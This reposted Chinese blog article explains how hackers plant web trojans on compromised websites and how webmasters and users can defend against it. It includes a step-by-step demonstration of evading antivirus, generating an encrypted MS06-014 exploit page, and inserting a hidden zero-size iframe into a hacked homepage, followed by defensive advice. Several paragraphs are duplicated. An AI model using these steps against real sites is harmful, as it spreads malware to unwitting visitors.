很多朋友都碰到过这样的现象:打开一个网站,结果页面还没显示,杀毒软件就开始报警,提示检测到***病毒。有经验的朋友会知道这是网页病毒,但是自己打开的明明是正规网站,没有哪家正规网站会将病毒放在自己的网页上吧?那么是什么导致了这种现象的发生呢?其中最有可能的一个原因就是:这个网站被挂马了。
挂马这个词目前我们似乎经常能听到,那么什么是挂马呢?挂马就是******了一些网站后,将自己编写的网页***嵌入被黑网站的主页中,利用被黑网站的流量将自己的网页***传播开去,以达到自己不可告人的目的。例如很多游戏网站被挂马,***的目的就是盗取浏览该网站玩家的游戏账号,而那些大型网站被挂马,则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让我们这些普通用户陷入***设下的陷阱,沦为***的肉鸡。下面就让我们来了解这种时下最流行的******手段。
挂马的核心:***
从“挂马”这个词中我们就可以知道,这和***脱离不了关系。的确,挂马的目的就是将***传播出去,挂马只是一种手段。挂马使用的***大致可以分为两类:一类是以远程控制为目的的***,***使用这种***进行挂马***,其目的是为了得到大量的肉鸡,以此对某些网站实施拒绝服务***或达到其他目的(目前绝大多数实施拒绝服务***的傀儡计算机都是挂马***的受害者)。另一类是键盘记录***,我们通常称其为盗号***,其目的不言而喻,都是冲着我们的游戏帐号或者银行帐号来的。目前挂马所使用的***多数属于后者。
***的免杀伎俩
作为挂马所用的***,其隐蔽性一定要高,这样就可以让用户在不知不觉中运行***,也可以让挂马的页面存活更多的时间。***为了让***躲避杀毒软件的查杀,使用的伎俩很多。通常使用的方法有:
加壳处理:关于壳的概念我们曾经介绍过,就是为了让别人无法修改编译好的程序文件,同时压缩程序体积。***经过加壳这一道工序后就有可能逃过杀毒软件的查杀,这也是为什么我们装了杀毒软件还会感染老病毒的原因。虽然目前的杀毒软件都支持对程序脱壳后再查杀,但只局限于一些比较热门的加壳程序,例如aspack、UPX等,而碰上一些经过冷门加壳程序处理后的***时,就无能为力了。所以加壳仍是***比较常用的免杀伎俩之一。
加壳处理:关于壳的概念我们曾经介绍过,就是为了让别人无法修改编译好的程序文件,同时压缩程序体积。***经过加壳这一道工序后就有可能逃过杀毒软件的查杀,这也是为什么我们装了杀毒软件还会感染老病毒的原因。虽然目前的杀毒软件都支持对程序脱壳后再查杀,但只局限于一些比较热门的加壳程序,例如aspack、UPX等,而碰上一些经过冷门加壳程序处理后的***时,就无能为力了。所以加壳仍是***比较常用的免杀伎俩之一。
冷门的加壳程序
修改特征码:杀毒软件是根据病毒特征码来判定一个程序是否是病毒的。杀毒软件在对程序进行检测时,如果在程序中发现了病毒特征码,就将该程序判定为病毒。***当然也明白这个道理,于是他们会修改***中被定为特征码的部分代码,将其加密或使用汇编指令将其跳转,这样杀毒软件就无法在***中找到病毒特征码,自然也就不会将其判定为病毒了。
修改特征码:杀毒软件是根据病毒特征码来判定一个程序是否是病毒的。杀毒软件在对程序进行检测时,如果在程序中发现了病毒特征码,就将该程序判定为病毒。***当然也明白这个道理,于是他们会修改***中被定为特征码的部分代码,将其加密或使用汇编指令将其跳转,这样杀毒软件就无法在***中找到病毒特征码,自然也就不会将其判定为病毒了。
虽然这两种方法都可以躲过杀毒软件的查杀,但是我们还是有办法阻止***运行的,具体方法将在防范部分讲到。那么***是如何“挂”在网站上的呢?这里我们以“灰鸽子”***为例,演示一下***挂马的过程。演示用的“灰鸽子”***已经经过免杀处理,杀毒软件无法查杀。
潜伏的***者:网页***
潜伏的***者:网页***
为什么我们一打开网页就会运行***程序,***又是如何“挂”在网站上的呢?这就要涉及“网页***”这个概念。
网页***就是将***和网页结合在一起,打开网页的同时也会运行***。最初的网页***原理是利用IE浏览器的ActiveX控件,运行网页***后会弹出一个控件下载提示,只有点击确认后才会运行其中的***。这种网页***在当时网络安全意识普遍不高的情况下还是有一点使用价值的,但是其缺点是显而易见的,就是会出现ActiveX控件下载提示。当然现在很少会有人去点击那莫名其妙的ActiveX控件下载确认窗口。
在这种情况下,新的网页***诞生了。这类网页***通常利用了IE浏览器的漏洞,在运行的时候没有丝毫提示,因此隐蔽性极高。可以说,正是IE浏览器层出不穷的漏洞造成了如今网页***横行的网络。例如最近的IE浏览器漏洞MS06-014,就可以利用来制作一个绝对隐蔽的网页***。下面让我们看看利用MS06-014制作网页***的过程。
网页***当然得有***程序,这里我们使用上文中提到的“灰鸽子”***。然后我们要下载一个MS06-014网页***生成器。接着还要一个网页空间,三者准备完毕后,就可以开始测试了。
生成网页***
首先将***程序上传到网页空间中。运行“MS06-014***生成器”,在“***地址”中填入已经上传到空间中的***网址,并勾选下方的“是否隐藏源码”选项。这个选项的作用是当网页***运行后,会自动清空网页源文件,用户即使起了疑心也无法找到痕迹。当然清空的是用户打开的源文件,而网页***却不受影响。点击“生成网马”按钮即可在程序的同目录生成一个名为muma.htm的网页***。
配置网页***
继续进行网页***的配置,在“欲加密的网页”中浏览选中生成的网页***。网页***在运行时会利用IE的漏洞,其中肯定存在漏洞利用代码,这些代码会被杀毒软件检测出来,因此要想隐蔽地运行网页***,加密***程序还不够,还需对网页***进行加密。“MS06-014***生成器”的“加密方式”中提供了四种网页的加密方式,分别是:空字符加密、转义字符加密、Escape加密和拆分特征码。这里我们使用“转义字符加密”加密方式,选中“转义字符加密”选项后点击“加密”按钮,免杀的网页***就生成了。将该加密过的网页***上传到网页空间中即可。
首先将***程序上传到网页空间中。运行“MS06-014***生成器”,在“***地址”中填入已经上传到空间中的***网址,并勾选下方的“是否隐藏源码”选项。这个选项的作用是当网页***运行后,会自动清空网页源文件,用户即使起了疑心也无法找到痕迹。当然清空的是用户打开的源文件,而网页***却不受影响。点击“生成网马”按钮即可在程序的同目录生成一个名为muma.htm的网页***。
配置网页***
继续进行网页***的配置,在“欲加密的网页”中浏览选中生成的网页***。网页***在运行时会利用IE的漏洞,其中肯定存在漏洞利用代码,这些代码会被杀毒软件检测出来,因此要想隐蔽地运行网页***,加密***程序还不够,还需对网页***进行加密。“MS06-014***生成器”的“加密方式”中提供了四种网页的加密方式,分别是:空字符加密、转义字符加密、Escape加密和拆分特征码。这里我们使用“转义字符加密”加密方式,选中“转义字符加密”选项后点击“加密”按钮,免杀的网页***就生成了。将该加密过的网页***上传到网页空间中即可。
寻找缺陷网站,写入网页***
网页***准备完毕,就等着寻找挂马的目标网站了。此时***会到处搜索,寻找有脚本缺陷的网站程序,找到后利用网站程序的漏洞***网站,并得到网站的一个webshell。这时我们可以编辑网站首页的内容,将挂马的代码插入即可。代码为:<iframe src="/muma.htm"; width="0" height="0" frameborder="0"></iframe>,src参数后面的是网页***的地址。当我们打开这个网站的首页后,会弹出网页***的页面,这个页面我们是无法看到的,因为我们在代码中设置了弹出页面的窗口长宽各为0。此时***也已经悄悄下载到本机并运行了。我们可以看到,网站的首页显示正常,杀毒软件并没有任何反应,而***却已经运行了,可见***的隐蔽性很高,危害也相当严重。成功运行***
网页***准备完毕,就等着寻找挂马的目标网站了。此时***会到处搜索,寻找有脚本缺陷的网站程序,找到后利用网站程序的漏洞***网站,并得到网站的一个webshell。这时我们可以编辑网站首页的内容,将挂马的代码插入即可。代码为:<iframe src="/muma.htm"; width="0" height="0" frameborder="0"></iframe>,src参数后面的是网页***的地址。当我们打开这个网站的首页后,会弹出网页***的页面,这个页面我们是无法看到的,因为我们在代码中设置了弹出页面的窗口长宽各为0。此时***也已经悄悄下载到本机并运行了。我们可以看到,网站的首页显示正常,杀毒软件并没有任何反应,而***却已经运行了,可见***的隐蔽性很高,危害也相当严重。成功运行***
铲除网站“挂马”毒瘤
“挂马”***已经成为目前最流行的***方式,面对数量庞大的“挂马”网站,我们该如何防御呢?作为一名网站站长,我们又如何知道自己的网站被人挂马了呢?
“挂马”***已经成为目前最流行的***方式,面对数量庞大的“挂马”网站,我们该如何防御呢?作为一名网站站长,我们又如何知道自己的网站被人挂马了呢?
站长防范:如果你是一名站长,可以对网站首页以及其他主要页面的源代码进行检查,用记事本打开这些页面后,以“<iframe>”为关键字进行搜索,找到后可以查看是否是挂马代码。不过碰上有经验的***,会编写一段代码将整句挂马代码进行加密,这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序,如果有个别网页被修改,我们可以很快地发现。
当然,最好的办法就是设置好网站的权限,对于使用动态语言编写的网站,一般对网页文件是不需要改动的,所有的数据都存储在数据库中。因此我们可以只对数据库所在的文件夹设置写权限,而对整个网站文件夹设置只读权限,这样即使网站存在漏洞,***也别想通过脚本漏洞***网站,更别说在主页上挂马了。
普通用户防范:普通用户关心的自然是如何防范“挂马”***。既然杀毒软件在网页***面前成了“睁眼瞎”,而我们又无法感知网站是否被“挂马”。在这种情况下,我们岂不是任人宰割?我们已经知道网页***的运行原理利用了IE浏览器的漏洞,因此只要我们及时更新系统补丁就可以让网页***失效了。开启系统“自动更新”的方法为:右键点击“我的电脑”,选择“属性”,切换到“自动更新”标签,选中其中的“自动(推荐)”即可。此外我们也可以使用“360安全卫士”等具有补丁更新功能的软件。运行“360安全卫士”后,点击“修复”→修复系统漏洞,即可查看系统的补丁状态,勾选未安装的补丁下载即可。使用“360安全卫士”更新补丁
杀毒软件在网页***前失去了作用,不代表我们就拿它没辙。我们可以使用一款名为System Safety Monitor(以下简称为SSM)的软件,在它的监控下,没有一个***病毒可以躲过它的眼睛。安装完毕后运行,其自动最小化到系统任务栏,开始对系统进行监控。SSM的监控功能相当强悍,系统内部的一些操作也会被监控并提醒。让我们看看SSM对付这种加密过的网页***效果如何,打开挂有***的网页。SSM马上弹出了一个拦截警告框,从警告窗口的内容中我们可以看到,iexplore.exe进程试图启动zi1224.com程序,其意思是IE浏览器想运行zi1224.com这个可执行程序。IE浏览器对于可执行程序是提示下载的,而不会直接运行,由此可见其中的猫腻,此时我们点击“拒绝”按钮就可以阻止网页***的运行了。SSM的监控原理和杀毒软件不同,其最大特点是可以监控到所有的网页***,由于其使用较一般安全软件来得复杂,因此建议中高级用户使用。
转载于:https://blog.51cto.com/xiong/27710
9209
到【灌水乐园】发言
Ctrl+Enter 发布
发布
取消